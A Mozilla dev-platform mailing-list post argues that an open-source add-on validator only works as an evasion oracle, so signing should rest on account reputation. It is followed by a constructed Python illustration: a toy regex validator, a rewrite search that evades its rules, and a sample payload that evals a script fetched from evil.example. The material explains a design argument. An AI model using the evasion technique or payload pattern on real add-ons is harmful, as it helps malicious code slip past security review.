On 27/11/15 15:50, Gavin Sharp wrote:
> No, that's not right. There's an important distinction between
> "finding malicious JS code" and "finding _all_ malicious JS code". The
> latter is impossible, but the former isn't.
>
> Proving "the validator won't catch everything" isn't particularly
> relevant when it isn't intended to, in the overall add-on signing
> system design.
If the validator is open source, which it is, then anyone who wants to get code past it can just use it as an oracle until it passes. Therefore, given malicious intent, I would expect the validator not to catch _anything_. We need to base the system on reputation, not on code scanning.

We can either hand out code signing certs and do the reputation based on them, or have an _automated_ code signing portal and tie the reputation to the accounts on that. As cert revocation doesn't work well, the latter seems to offer much more control and to be the better plan.

If we accept, as you seem to, that no system can catch everything, then I think the right "not catching everything" is the risk of AMO high-reputation account compromise. Having that as your weak spot allows the building of a system where people like Dan, who have high reputation, can automatically sign as many builds as they want and, fundamentally, keep shipping products. Which is what we all want.

Gerv

_______________________________________________
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform
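The "use it as an oracle until it passes" point above, worked through as an added example. This is not code from the thread and not Mozilla's add-on validator: the rule set, the two rewrites and the sample add-on snippet are all constructed for illustration. The scanner stands in for any open-source, pattern-based validator; the search loop stands in for an attacker who can run that scanner locally as often as they like.

```python
"""Toy model of the "validator as an oracle" argument.

Constructed example: the scanner below is a stand-in for an open-source
validator, not Mozilla's real add-on validator, and the rule set, the
rewrites and the sample add-on code are all invented for illustration.
The attacker runs the scanner locally as often as they like and stops
as soon as it reports nothing.
"""
import re
from collections import deque

# Hypothetical validator rules: (rule name, regex).  A real validator has
# many more, but any finite, inspectable rule set has the same problem.
RULES = [
    ("eval-call", re.compile(r"\beval\s*\(")),
    ("function-ctor", re.compile(r"\bFunction\s*\(")),
    ("remote-script", re.compile(r"""https?://[^"' ]+\.js""")),
]


def validate(source):
    """The oracle: names of rules that fire; an empty list means 'passes'."""
    return [name for name, rx in RULES if rx.search(source)]


def string_literal_spans(source):
    """(start, end) of each double-quoted literal, honouring backslash escapes."""
    spans, i = [], 0
    while i < len(source):
        if source[i] != '"':
            i += 1
            continue
        j = i + 1
        while j < len(source) and source[j] != '"':
            j += 2 if source[j] == "\\" else 1
        spans.append((i, j + 1))
        i = j + 1
    return spans


def split_first_literal(source):
    """Semantics-preserving rewrite: "abcdef" -> "abc" + "def" for the first
    literal of at least 4 characters, so a pattern spanning it stops matching."""
    for start, end in string_literal_spans(source):
        inner = source[start + 1:end - 1]
        if len(inner) >= 4:
            mid = len(inner) // 2
            return source[:start] + '"%s" + "%s"' % (inner[:mid], inner[mid:]) + source[end:]
    return source


def alias_global_call(source):
    """Semantics-preserving rewrite: eval(x) -> globalThis["ev" + "al"](x)."""
    m = re.search(r"\b(eval|Function)\s*\(", source)
    if not m:
        return source
    name = m.group(1)
    alias = 'globalThis["%s" + "%s"]' % (name[:2], name[2:])
    return source[:m.start()] + alias + "(" + source[m.end():]


REWRITES = [split_first_literal, alias_global_call]


def evade(source, max_steps=500):
    """Breadth-first search over rewrites, asking validate() at every step.
    Returns (passing_source, oracle_queries) or (None, oracle_queries)."""
    seen, queue, queries = {source}, deque([source]), 0
    while queue and queries < max_steps:
        cur = queue.popleft()
        queries += 1
        if not validate(cur):
            return cur, queries
        for rewrite in REWRITES:
            nxt = rewrite(cur)
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return None, queries


# Constructed sample of the code an attacker wants past the scanner.
PAYLOAD = 'eval(loadText("https://evil.example/payload.js"));'

if __name__ == "__main__":
    print("before:", validate(PAYLOAD))                  # ['eval-call', 'remote-script']
    passing, n = evade(PAYLOAD)
    print("after %d oracle queries:" % n, passing)
    print("validator now reports:", validate(passing))  # []
```

The loop never needs to understand why a rule fires, only whether it fires, which is exactly what a locally runnable validator tells it for free. Adding rules moves the search around; it does not end it, since the search space of semantics-preserving rewrites is unbounded while the rule set is not.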